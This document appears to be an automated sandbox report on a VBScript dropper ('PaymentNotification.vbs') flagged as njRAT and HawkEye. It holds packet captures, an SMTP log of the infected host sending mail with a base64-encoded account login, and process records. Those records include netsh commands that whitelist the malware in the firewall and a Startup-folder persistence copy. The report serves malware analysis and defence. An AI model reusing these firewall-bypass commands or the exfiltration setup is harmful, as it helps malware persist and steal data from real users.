Apr 28, 2021 20:50:55.724474907 CEST	885	IN	HTTP/1.1 403 Forbidden Date: Wed, 28 Apr 2021 18:50:55 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: keep-alive X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Set-Cookie: __cfduid=d2d801be5ab4d384e31a0cda7ace565511619635855; expires=Fri, 28-May-21 18:50:55 GMT; path=/; domain=.whatismyipaddress.com; HttpOnly; SameSite=Lax; Secure cf-request-id: 09bb6af95500004a972c89b000000001 Set-Cookie: __cf_bm=cd9f7279d4ed65a28ab854fe93b197ab0083d204-1619635855-1800-AblRiLN8v8jUSsX1yzccj9OeQvb0d3FKoY8GAZLX4uSW/L/oF2ywsEqLg0ZLpTxPl4rXemFqIaXQ+XvEMkDodH8=; path=/; expires=Wed, 28-Apr-21 19:20:55 GMT; domain=.whatismyipaddress.com; HttpOnly Server: cloudflare CF-RAY: 64727aa229f04a97-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 28, 2021 20:49:38.428610086 CEST	207.241.227.114	443	192.168.2.6	49699	CN=*.us.archive.org, OU=Domain Control Validated CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Mon Dec 23 14:16:32 CET 2019 Tue May 03 09:00:00 CEST 2011 Wed Jan 01 08:00:00 CET 2014 Tue Jun 29 19:06:20 CEST 2004	Mon Feb 21 23:56:17 CET 2022 Sat May 03 09:00:00 CEST 2031 Fri May 30 09:00:00 CEST 2031 Thu Jun 29 19:06:20 CEST 2034	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	Tue May 03 09:00:00 CEST 2011	Sat May 03 09:00:00 CEST 2031
					CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Wed Jan 01 08:00:00 CET 2014	Fri May 30 09:00:00 CEST 2031
					OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US	Tue Jun 29 19:06:20 CEST 2004	Thu Jun 29 19:06:20 CEST 2034

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Apr 28, 2021 20:50:58.251331091 CEST	587	49726	103.6.196.196	192.168.2.6	220-kentrosaurus2.mschosting.com ESMTP Exim 4.94 #2 Thu, 29 Apr 2021 02:50:57 +0800 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 28, 2021 20:50:58.251832962 CEST	49726	587	192.168.2.6	103.6.196.196	EHLO 965969
Apr 28, 2021 20:50:58.532615900 CEST	587	49726	103.6.196.196	192.168.2.6	250-kentrosaurus2.mschosting.com Hello 965969 [84.17.52.3] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-X_PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 28, 2021 20:50:58.533673048 CEST	49726	587	192.168.2.6	103.6.196.196	AUTH login dHMubGVlQG5lZXNvb250YXQuY29tLm15
Apr 28, 2021 20:50:58.815630913 CEST	587	49726	103.6.196.196	192.168.2.6	334 UGFzc3dvcmQ6
Apr 28, 2021 20:50:59.104113102 CEST	587	49726	103.6.196.196	192.168.2.6	235 Authentication succeeded
Apr 28, 2021 20:50:59.104830980 CEST	49726	587	192.168.2.6	103.6.196.196	MAIL FROM:<ts.lee@neesoontat.com.my>
Apr 28, 2021 20:50:59.385138035 CEST	587	49726	103.6.196.196	192.168.2.6	250 OK
Apr 28, 2021 20:50:59.385399103 CEST	49726	587	192.168.2.6	103.6.196.196	RCPT TO:<ts.lee@neesoontat.com.my>
Apr 28, 2021 20:50:59.668490887 CEST	587	49726	103.6.196.196	192.168.2.6	250 Accepted
Apr 28, 2021 20:50:59.669125080 CEST	49726	587	192.168.2.6	103.6.196.196	DATA
Apr 28, 2021 20:50:59.950777054 CEST	587	49726	103.6.196.196	192.168.2.6	354 Enter message, ending with "." on a line by itself
Apr 28, 2021 20:51:00.275790930 CEST	49726	587	192.168.2.6	103.6.196.196	.
Apr 28, 2021 20:51:00.559552908 CEST	587	49726	103.6.196.196	192.168.2.6	250 OK id=1lbpH2-009Fqm-2D
Apr 28, 2021 20:51:09.105494976 CEST	587	49732	103.6.196.196	192.168.2.6	220-kentrosaurus2.mschosting.com ESMTP Exim 4.94 #2 Thu, 29 Apr 2021 02:51:08 +0800 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Apr 28, 2021 20:51:09.106009960 CEST	49732	587	192.168.2.6	103.6.196.196	EHLO 965969
Apr 28, 2021 20:51:09.398216009 CEST	587	49732	103.6.196.196	192.168.2.6	250-kentrosaurus2.mschosting.com Hello 965969 [84.17.52.3] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-X_PIPE_CONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Apr 28, 2021 20:51:09.398889065 CEST	49732	587	192.168.2.6	103.6.196.196	AUTH login dHMubGVlQG5lZXNvb250YXQuY29tLm15
Apr 28, 2021 20:51:09.691092968 CEST	587	49732	103.6.196.196	192.168.2.6	334 UGFzc3dvcmQ6
Apr 28, 2021 20:51:09.995273113 CEST	587	49732	103.6.196.196	192.168.2.6	235 Authentication succeeded
Apr 28, 2021 20:51:09.995539904 CEST	49732	587	192.168.2.6	103.6.196.196	MAIL FROM:<ts.lee@neesoontat.com.my>
Apr 28, 2021 20:51:10.287507057 CEST	587	49732	103.6.196.196	192.168.2.6	250 OK
Apr 28, 2021 20:51:10.287853956 CEST	49732	587	192.168.2.6	103.6.196.196	RCPT TO:<ts.lee@neesoontat.com.my>
Apr 28, 2021 20:51:10.582817078 CEST	587	49732	103.6.196.196	192.168.2.6	250 Accepted
Apr 28, 2021 20:51:10.583074093 CEST	49732	587	192.168.2.6	103.6.196.196	DATA
Apr 28, 2021 20:51:10.876995087 CEST	587	49732	103.6.196.196	192.168.2.6	354 Enter message, ending with "." on a line by itself
Apr 28, 2021 20:51:10.877901077 CEST	49732	587	192.168.2.6	103.6.196.196	.
Apr 28, 2021 20:51:11.178523064 CEST	587	49732	103.6.196.196	192.168.2.6	250 OK id=1lbpHC-009G1g-Vi

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 5972 Parent PID: 3440

General

Start time:	20:49:34
Start date:	28/04/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\PaymentNotification.vbs'
Imagebase:	0x7ff73ad40000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.342778002.000001B866BB3000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000002.374043001.000001B866BB2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: SUSP_Double_Base64_Encoded_Executable, Description: Detects an executable that has been encoded with base64 twice, Source: 00000000.00000003.341582297.000001B865D3F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Analysis Process: Tmp.exe PID: 240 Parent PID: 5972

General

Start time:	20:49:45
Start date:	28/04/2021
Path:	C:\Users\user\AppData\Local\Temp\Tmp.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Local\Temp\Tmp.exe'
Imagebase:	0x1d0000
File size:	69632 bytes
MD5 hash:	9B30598F8F05C46F8ABB22A4C2ABCC9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Brian Wallace @botnet_hunter
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 78%, Metadefender, Browse Detection: 83%, ReversingLabs
Reputation:	low

Analysis Process: pgr.exe PID: 1068 Parent PID: 5972

General

Start time:	20:49:48
Start date:	28/04/2021
Path:	C:\Users\user\AppData\Local\Temp\pgr.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\pgr.exe'
Imagebase:	0x80000
File size:	24064 bytes
MD5 hash:	A08F2FAC257ABBBDDDBBD4439F32CFD0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 91%, Metadefender, Browse Detection: 91%, ReversingLabs
Reputation:	low

Analysis Process: servieda.exe PID: 5648 Parent PID: 240

General

Start time:	20:49:49
Start date:	28/04/2021
Path:	C:\Users\user\AppData\Roaming\servieda.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Roaming\servieda.exe'
Imagebase:	0xa0000
File size:	69632 bytes
MD5 hash:	9B30598F8F05C46F8ABB22A4C2ABCC9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, Author: Brian Wallace @botnet_hunter Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\servieda.exe, Author: Brian Wallace @botnet_hunter
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 78%, Metadefender, Browse Detection: 83%, ReversingLabs
Reputation:	low

Analysis Process: netsh.exe PID: 4592 Parent PID: 5648

General

Start time:	20:49:52
Start date:	28/04/2021
Path:	C:\Windows\System32\netsh.exe
Wow64 process (32bit):	false
Commandline:	netsh firewall add allowedprogram 'C:\Users\user\AppData\Roaming\servieda.exe' 'servieda.exe' ENABLE
Imagebase:	0x7ff695dc0000
File size:	92672 bytes
MD5 hash:	98CC37BBF363A38834253E22C80A8F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: conhost.exe PID: 4860 Parent PID: 4592

General

Start time:	20:49:52
Start date:	28/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: netsh.exe PID: 5596 Parent PID: 1068

General

Start time:	20:49:55
Start date:	28/04/2021
Path:	C:\Windows\SysWOW64\netsh.exe
Wow64 process (32bit):	true
Commandline:	netsh firewall add allowedprogram 'C:\Users\user\AppData\Local\Temp\pgr.exe' 'pgr.exe' ENABLE
Imagebase:	0x9e0000
File size:	82944 bytes
MD5 hash:	A0AA3322BB46BBFC36AB9DC1DBBBB807
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 956 Parent PID: 5596

General

Start time:	20:49:56
Start date:	28/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff61de10000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244 Parent PID: 3440

General

Start time:	20:50:02
Start date:	28/04/2021
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe
Wow64 process (32bit):	false
Commandline:	'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe'
Imagebase:	0xa70000
File size:	69632 bytes
MD5 hash:	9B30598F8F05C46F8ABB22A4C2ABCC9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
